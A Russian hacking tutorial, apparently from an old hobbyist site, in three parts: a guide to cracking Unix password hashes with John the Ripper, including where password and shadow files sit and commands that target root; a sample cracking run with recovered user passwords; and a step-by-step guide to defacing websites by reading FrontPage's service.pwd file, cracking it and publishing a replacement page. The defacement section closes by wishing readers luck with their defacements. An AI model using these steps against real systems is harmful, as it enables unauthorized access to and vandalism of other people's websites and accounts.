Эта статья написана для тех, кто столкнулся с паролями Unix систем, но еще стоит на пороге выбора программы для расшифровки паролей для этой системы.

Я думаю, что ни для кого не будет секретом, что наиболее продвинутой программой для расшифровки Unix паррлей является John the Ripper. О нем то и пойдет речь в этой статье.

Многие люди задают вопрос, как им пользоваться. Как правило это происходит потому, что знания их в английском оставляют желать лучшего, а именно на нем и написана ридми.

KodsWeb и здесь приходит вам на помощь. Итак приступим...

Чем взламывают пароли
=====================

JTR используется для восстановления паролей Unix, Windows95, NT, DOS.
Но так уж закрепилось со временем, что эту программу используют в основном для взлома Unix-пассвордов.
Для восстановления NT/2000 паролей, как правило, используют L0phtCrack.
Для расшифровки .PWL в винде 95/98 используют PWL-Tool. Ну так уж заведено.
И ничего с этим не поделаешь...

Шифрация паролей в Unix like systems.
=====================================

В Линуксе пароли шифруются в алгоритме DES. Когда вы поставите несколько паролей в JTR на декодирование, то увидите следующее:
W:\john-16\run>john passwd.txt
Loaded 6 passwords with 6 different salts (Standard DES [24/32 4K])

Здесь появляется такая фишка salt - это две любые буквы, которые являются ключем к паролю, то есть salt и используется для шифрации паролей.

В FreeBSD используется более стойкий алгоритм шифрования MD5.
В Open BSD используется алгоритм Blowfish.

Где хранятся пароли
===================


Как правило, пароли хранятся вот в таких местах:
/etc/passwd
/etc/shadow
/etc/shadow.old
/etc/passwd.tmp
В Free BSD пароли хранятся в файле /etc/master.passwd


Для того, чтобы узнать, где именно они хранятся, делаем листинг директории, там сразу станет ясно.

Пароли также могут хранится в .passwd Открываем этот файлик и получаем пароль.
root:Z83Pl1XBw/QcI:0:0:System Administrator:/root:/bin/csh
migel:4xCSQ5k1xGHdk:66:1:Migel Rodriges, 3-rd Avenue:/home/migel:/bin/sh


Однако пароль может находиться там и в shadow режиме.
Тогда видим следующее:
root:*:0:0:System Administrator:/root:/bin/csh rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
Если получили что-то подобное, то смело бросайте это, потому как паролей здесь нет.

Разберем пароль по частям
=========================


migel:4xCSQ5k1xGHdk:66:1:Migel Rodriges, 3-rd Avenue:/home/migel:/bin/sh
~ migel - имя пользователя.
~ 4xCSQ5k1xGHdk - пароль, зашифрованный в DES.
~ 66:1 - номер пользователя в системе : номер рабочей группы (у root всегда 0:0).
~ Migel Rodriges, 3-rd Avenue - информация о пользователе
~ /home/migel - домашний каталог пользователя
~ /bin/sh - шелл

Триксы
======

На файл с паролями, зашифрованными в DES, будь то shadow или passwd, права установлены как r-------- : права на чтеное есть только у root'а, или r--r----- : права на чтеное есть у рута и зарегистрированных пользователей. пользователей. Следовательно, через htmlscript их вряд ли удастся просмотреть. Конечно иногда везет и получается просмотреть все их содержимое.

Использование John The Ripper
=============================

А теперь перейдем непосредственно к взлому паролей с использованием JTR. Хочу сразу предупредить, что это еще не факт, что вы сможете расшифровать пароли. Все будет зависеть от самого пароля, то есть из каких символов он составлен и от количества этих символов.

Приступим...

Засовываем пароли в текстовой файл и обзываем его как passwd.txt, затем кладем его в папку john-16/run/ (я привожу пример для той версии Джона, которую можно слить с нашего сайта).

Также необходимо соблюдать правильную конструкцию размещения паролей в файл. Она должна выглядеть следующим образом:
root:Z83Pl1XBw/QcI:0:0:System Administrator:/root:/bin/csh
migel:4xCSQ5k1xGHdk:66:1:Migel Rodriges, 3-rd Avenue:/home/migel:/bin/sh ...

...


Затем, если вы работаете из под винды, то запускаем DOS Prompt и заходим в папку john-16/run/, запускаем john.exe (у меня полный путь выглядел следуюшим образом cd W:\john-16\run\john.exe). Далее нам предлагают небольшой help, но сейчас он нам не нужен.

Все, мы в программе.

Наиболее эффективные режимы перебора паролей.
=============================================

1. Команда john passwd.txt
После введения данной команды Джон начнет перебирать пароли брутфорсом. Это значит, что JTR будет сам генерировать пароли и подставлять их. Метод не особо эффективный, потому как может занять много времени, если вообще вы увидите в guesses выражение отличние от нуля. Кроме того, многое будет зависеть от мощности вашего компьютера. Так, имея за плечами навороченную машину, можно побаловаться и брутфорсом.

2. john -w:wordlist passwd.txt
john -w:wordlist -rules passwd.txt

(-rules обозначает включение правил синтаксиса для словаря). После введения этой команды Джон начнет перебирать пароли по словарю. Этот метод намного эффективнее первого. И пароли здесь будут подбираться намного быстрее. Я бы даже сказал, что это наиболее эффективный метод из всех.

3. john -single passwd.txt
Одиночный режим перебора паролей. Работает намного быстрее, чем перебор по словарю, однако расчитан на слабые пароли.

4. john -i passwd
Режим приражения (incremental mode). Судя по тому, что написано в readme, это самый сильный способ переборки паролей. Для подстановки использует 95 символов.

5. john -i:alpha passwd
Если пароль состоит только из букв, то поможет этот метод, так как JTR будет перебирать 26 символов от "a" до "z".

Дополнительные опции в режимах
==============================


Режимами являются, к примеру -w (словарь), -i(инкремент), -single(одиночка).

1. john -w:wordlist -rules -users:0 passwd.txt
Будет подбирать пароль для конкретного пользователя с использованием словаря и правил. Мы указали :0 - значит будет вестись перебор для пользователя root :-) Для выбора пользователя необходимо указать имя пользователя в системе -UID после ":".

2. john -w:wordlist -rules -shells:sh,csh,tcsh,bash passwd.txt
Будет осуществлять перебор паролей только тех пользователей, которые имеют шелл.

3. john -single passwd.txt passwd1.txt passwd2.txt
Ставим на расшифровку сразу несколько файлов, зашифрованных в DES. Данный способ работает со всеми режимами и опциями. Для этого нужно просто в конце каждый команды сделать перечисление файлов, которые необходимо расшифровать, как это сделано в этом примере.

4. unshadow passwd shadow
Данная команды используется для восстановления файла с паролями в shadow. Не трудно догадаться, что для использования данной команды нужен shadow-файл.

5. john -show passwd.txt
Наконец, самое приятное. Кульминация нашей работы с JTR - команда просмотра подобранных паролей.

На самом деле в readme вы можете прочитать еще кучу способов перебора паролей. Здесь указаны основные, но именно те, которые наиболее часто всеми используются и действительно эффективны.

Теперь вы умеете взламывать пароли от Unix.
А я пойду подумаю, о чем вам еще рассказать.

Желаю вам, чтобы ваш -show всегда был полон.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Статья является дополнением к инструкции по JTR.

Встречаю я тут кексов, которые пишут письма с такими вопросами:

"Я в JTR забил запрос, как написано у вас в статье, а он все равно не работает. Ничего не появляется на экране. Приходится держать пробел, чтобы перебор шел. А без этого экран остается пустым."

Так вот, ничего и не должно появляться, самое главное это появление одной строки
Loaded 6 passwords with 6 different salts (Standard DES [24/32 4K])
Все, больше ничего не надо, перебор начался. Я оставлял так перебор на пару дней и только в конце второго дня пароль был разгадан. Здесь дело времени.

W:\john-16\run>john passwd.txt
Loaded 6 passwords with 6 different salts (Standard DES [24/32 4K])
Наличие таких строк достаточно. Если вы ведете перебор по словарю и хотите узнать, сколько процентов паролей перебрано, тогда нажмите любую кнопку на клаве, и вы сможете увидеть процент завершенности.

Вот вам пример работы JTR'а на моем компьютере.

W:\john-16\run>john passwd.txt
Loaded 6 passwords with 6 different salts (Standard DES [24/32 4K])
informix         (marina)
guesses: 1  time: 0:00:00:06 16% (2)  c/s: 15105  trying: COLUMBIA - CALVIN
anne3            (dima)
guesses: 2  time: 0:00:00:16 52% (2)  c/s: 14808  trying: vanillA - 2george
guesses: 2  time: 0:00:00:19 63% (2)  c/s: 15037  trying: Hunter5 - Thunder5
guesses: 2  time: 0:00:00:22 74% (2)  c/s: 15203  trying: Mexico? - Paladin?
guesses: 2  time: 0:00:00:26 84% (2)  c/s: 14740  trying: 6marlbor - 6badger
guesses: 2  time: 0:00:00:29 95% (2)  c/s: 14896  trying: Acuring - Memphisi
guesses: 2  time: 0:00:00:33 (3)  c/s: 13328  trying: beange - bobina
guesses: 2  time: 0:00:00:49 (3)  c/s: 11787  trying: clivi1 - callis
guesses: 2  time: 0:00:00:53 (3)  c/s: 11817  trying: alec - ac24
guesses: 2  time: 0:00:00:54 (3)  c/s: 11900  trying: fpq - feb
guesses: 2  time: 0:00:00:56 (3)  c/s: 11765  trying: basele1 - boolone
guesses: 2  time: 0:00:00:57 (3)  c/s: 11844  trying: sponde - bricel
guesses: 2  time: 0:00:00:58 (3)  c/s: 11920  trying: ab6860 - shrumn
guesses: 2  time: 0:00:01:00 (3)  c/s: 11793  trying: dbf - seacer
guesses: 2  time: 0:00:01:01 (3)  c/s: 11866  trying: crie14 - mytese
luck             (keysey)
guesses: 3  time: 0:00:01:02 (3)  c/s: 11937  trying: 2922 - slag
guesses: 3  time: 0:00:01:08 (3)  c/s: 11840  trying: suku - 2291
guesses: 3  time: 0:00:01:09 (3)  c/s: 11904  trying: clepshan - meddiers
guesses: 3  time: 0:00:01:11 (3)  c/s: 11798  trying: sandelli - clingra1
guesses: 3  time: 0:00:01:12 (3)  c/s: 11860  trying: sandelak - clingrol

guesses: 3  time: 0:00:04:10 (3)  c/s: 13234  trying: canghnia - shithbea
guesses: 3  time: 0:00:04:11 (3)  c/s: 13246  trying: candatia - shint246
150162           (denis)
guesses: 4  time: 0:00:04:59 (3)  c/s: 13375  trying: praghead - miklatin
guesses: 4  time: 0:00:06:29 (3)  c/s: 13499  trying: 54ty - 51ly
guesses: 4  time: 0:00:12:03 (3)  c/s: 13625  trying: jenjug - Stosaw
guesses: 4  time: 0:00:12:04 (3)  c/s: 13629  trying: skaur1 - pcas5a
guesses: 4  time: 0:00:12:05 (3)  c/s: 13632  trying: carapate - pettlate
guesses: 4  time: 0:00:12:07 (3)  c/s: 13639  trying: merrin11 - bearlocj
guesses: 4  time: 0:00:12:09 (3)  c/s: 13624  trying: chitclla - praigiou
guesses: 4  time: 0:00:12:10 (3)  c/s: 13628  trying: pinday.s - stevaldt
guesses: 4  time: 0:00:12:11 (3)  c/s: 13631  trying: moodfldt - breack22
guesses: 4  time: 0:00:12:12 (3)  c/s: 13635  trying: baradow1 - chelart!
guesses: 4  time: 0:00:12:14 (3)  c/s: 13642  trying: shildowl - morech94
guesses: 4  time: 0:00:12:16 (3)  c/s: 13627  trying: buckyolo - coccon92
guesses: 4  time: 0:00:12:17 (3)  c/s: 13631  trying: clepcond - poolosin

Далее

W:\john-16\run>john -show passwd.txt
dima:anne3:500:500::/home/g.giraud:/bin/bash 
keysey:luck:501:501::/home/pages_web:/bin/bash 
marina:informix:502:502::/home/informix:/bin/bash
denis:150162:507:100::/home/pages_web:/bin/bash
4 passwords cracked, 2 left


Теперь, надеюсь, проблем быть не должно.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Сегодня речь пойдет о том, как задефейсить сайт с помощью фронтпейджа. Полазив по диску очередного сайта, Мы натыкаемся на папку /_vti_pvt/, листинг которой выглядит следующим образом (может меняться в зависимости от случая):

../../_vti_pvt/:
access.cnf
botinfs.cnf
bots.cnf
deptodoc.btr
doctodep.btr
frontpg.lck
linkinfo.cnf
service.cnf
service.grp
service.lck
service.pwd
services.cnf
structure.cnf
svcacl.cnf
writeto.cnf


service.pwd выдаст нам пароль от Frontpage
# -FrontPage-
beam:/1AZScEnjx.K6


service.grp покажет администраторов и авторов, которые также имеют доступ к сайту
# -FrontPage-
administrators: beam
authors:
В данном случае админ и автор - одно лицо.

Теперь открываем Frontpage (у меня в комплекте MS Office 2000). Распинаться в этой статье я не стану, поэтому наша задача будет ограничена только дефейсом.

Рабочий стол ->> Мои документы ->> My Web

Стираем все в этой папке и кладем туда дефейсовую страницу с названием index.html или index.htm, что можно без проблем узнать предварительно, сделав листинг основной директории сайта. На самом деле это важно, и, возможно, придется коннектится к сайту раза два, так как я, к примеру, встречал ситуации, когда .html точно была главной страницей загрузки, но когда я ее замнял, дефейс не появлялся, хотя, когда я посылал запрос www.victim.com/index.html, мой дефейс светился как надо. На самом деле происходило автоматические переключение на .htm расширение как главное. Проблему я исправил при следующем коннекте, когда удалил .htm совсем, после чего насладился дефейсом. А вообще я бы посоветовал сразу не удалять ничего, что спросит Frontpage, а оставлять, удалить можно всегда, а вот восстановить не всегда, и дефейс можен накрыться. У меня такое уже было.

->> Frontpage
Files ->> Open Web ->> My Web
Слева во фрейме программы появится листинг директории My Web, которую мы открыли.
Там должна быть одна ваша страница index'а.

Далее ->> File ->> Publish Web
Высветится окно, которое предложит вам выбрать сайт, куда коннектится.
Вводите туда адрес сайта, пароль от Frontpage'а которого вы достали.

Connecting to server...

Если все нормально, то должно появится окно ввода логина и пароля.
Теперь берем JTR, забиваем в него файлик с паролем и жмем
john -w:yourSUPERwordlistwithallwords.lst -rules passwd.txt
Через пару часов снимаем разгаданный пароль (если вообще он будет разгадан), и вписываем его вместе с логином в появившееся окно.

Connected to server...
И ваш дефейс практически состоялся.

Предварительно можно покопаться в настройках Frontpage'а и сделать так чтобы обновлялясь только одна страница, а не весь сайт (очень полезно). Да кому как, можно и все удалить, здесь дело вкуса.

Возможные казусы при коннекте:
Can't find Frontpage extensions on the server you are trying to connect to (писал по памяти, так что прощайте, если что не так).
Тут надо поэкспериментировать со строкой названия сервера, к которому вы коннектитесь. Типа такого
http://www.server.com
www.server.com
server.com

Попытайтесь это сделать еще несколько раз, бывает, что установленный Frontpage у прова просто глючит. У меня було даже такое, что заработало только через пару дней. Так что не выбрасывайте неполучившиеся коннекты, позже к ним вернетесь.

На вопросы удалять страницы лишние с сервера или нет отвечайте НЕТ всегда, это убережет вас от проблем. Я так пару раз доудалялся...обломался потом с дефейсом.

На этом все.
Удачи в ваших дефейсах!
Да, и, когда будите их делать, не забудьте про того, кто вам об этом рассказал :-)

[<ВЗАД]//[ДАЛЕЕ]
Hosted by uCoz